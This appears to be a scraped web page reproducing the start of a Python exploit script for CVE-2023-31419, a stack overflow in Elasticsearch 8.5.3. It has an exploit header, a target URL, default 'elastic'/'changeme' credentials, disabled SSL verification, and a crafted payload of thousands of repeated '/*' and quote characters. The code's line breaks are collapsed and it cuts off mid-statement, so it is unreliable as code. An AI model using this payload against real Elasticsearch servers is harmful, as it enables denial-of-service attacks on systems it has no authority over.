Elasticsearch 8.5.3 Stack Overflow - KizzMyAnthia.com

# Exploit Author: TOUHAMI KASBAOUI# Vendor Homepage: https://elastic.co/# Version: 8.5.3 / OpenSearch# Tested on: Ubuntu 20.04 LTS# CVE : CVE-2023-31419# Ref: https://github.com/sqrtZeroKnowledge/Elasticsearch-Exploit-CVE-2023-31419import requestsimport randomimport stringes_url = 'http://localhost:9200' # Replace with your Elasticsearch server URLindex_name = '*'payload = "/*" * 10000 + "" +"'" * 999verify_ssl = Falseusername = 'elastic'password = 'changeme'auth = (username, password)num_queries =

Related Keywords

,Exploit Author ,Vendor Homepage ,Search Query ,